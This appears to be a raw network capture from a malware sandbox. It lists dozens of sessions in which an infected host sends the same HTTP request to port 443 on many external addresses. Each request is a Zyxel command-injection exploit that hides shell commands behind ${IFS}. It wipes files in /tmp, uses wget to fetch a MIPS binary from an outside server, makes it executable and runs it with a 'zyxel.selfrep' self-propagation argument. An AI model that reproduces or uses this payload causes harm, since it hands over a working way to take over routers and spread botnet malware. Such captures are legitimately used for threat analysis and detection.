                                            Jan 14, 2024 15:50:34.326344967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2820192.168.2.2344024221.244.50.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326351881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2821192.168.2.2348402136.213.206.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326390028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2822192.168.2.2338704119.110.2.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326428890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2823192.168.2.2341568211.146.120.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326464891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2824192.168.2.23360624.179.190.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326518059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2825192.168.2.2344228132.171.226.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326524973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2826192.168.2.2349540217.184.127.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326575994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2827192.168.2.2342808196.43.38.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326596022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2828192.168.2.235037092.242.227.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326618910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2829192.168.2.2352796181.225.101.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326644897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2830192.168.2.235452867.12.168.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326675892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2831192.168.2.234304873.122.136.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326683998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2832192.168.2.2347076223.87.230.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326723099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2833192.168.2.2354700100.170.100.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326745033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2834192.168.2.236085054.98.255.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326783895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2835192.168.2.234975091.232.18.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326786041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2836192.168.2.2358598201.165.178.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326827049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2837192.168.2.236088417.71.51.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326853991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2838192.168.2.2359600205.217.177.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326906919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2839192.168.2.23469681.79.68.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326929092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2840192.168.2.2357280131.161.57.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326951981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2841192.168.2.2358998210.50.209.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326966047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2842192.168.2.234166691.255.239.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326994896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2843192.168.2.234853253.163.62.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327032089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2844192.168.2.235036458.177.180.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327054024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2845192.168.2.235562619.104.56.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327068090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2846192.168.2.236025459.243.235.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327119112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2847192.168.2.2341116211.65.19.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327136040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2848192.168.2.2333238170.113.129.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327172995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2849192.168.2.2352092210.101.213.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327202082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2850192.168.2.2354736161.99.96.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327224970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2851192.168.2.2359204210.253.9.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327280045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2852192.168.2.234371020.6.196.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327311039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2853192.168.2.2343108222.139.224.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327322960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2854192.168.2.2356982221.190.148.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327370882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2855192.168.2.2342770129.101.199.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327394009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2856192.168.2.233731636.159.151.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327487946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2857192.168.2.2360860165.23.251.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327507973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2858192.168.2.234587278.174.43.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327527046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2859192.168.2.234358669.33.142.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327550888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2860192.168.2.2353428116.86.212.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327605009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2861192.168.2.235684644.129.28.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327619076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2862192.168.2.2349744166.224.133.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327639103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2863192.168.2.2353392142.27.87.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327673912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2864192.168.2.233641838.13.146.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327728033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2865192.168.2.235465271.35.24.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327759981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2866192.168.2.234235869.132.66.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327783108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2867192.168.2.2347792203.114.100.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327833891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2868192.168.2.2346020108.94.118.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327871084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2869192.168.2.2354240114.189.111.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327919006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2870192.168.2.2360248171.242.206.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327955961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2871192.168.2.2359762157.243.245.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327960014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2872192.168.2.2358428108.28.42.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.327994108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2873192.168.2.233982069.212.185.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328025103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2874192.168.2.233852881.164.6.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328046083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2875192.168.2.234807824.39.78.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328089952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2876192.168.2.234701636.32.23.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328128099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2877192.168.2.234531065.26.2.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328155041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2878192.168.2.236094625.150.141.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328166962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2879192.168.2.2344442149.222.179.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328195095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2880192.168.2.234535234.227.6.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328233957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2881192.168.2.234260478.101.174.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328253031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2882192.168.2.235469095.112.63.8443
                                            TimestampBytes transferredDirectionData
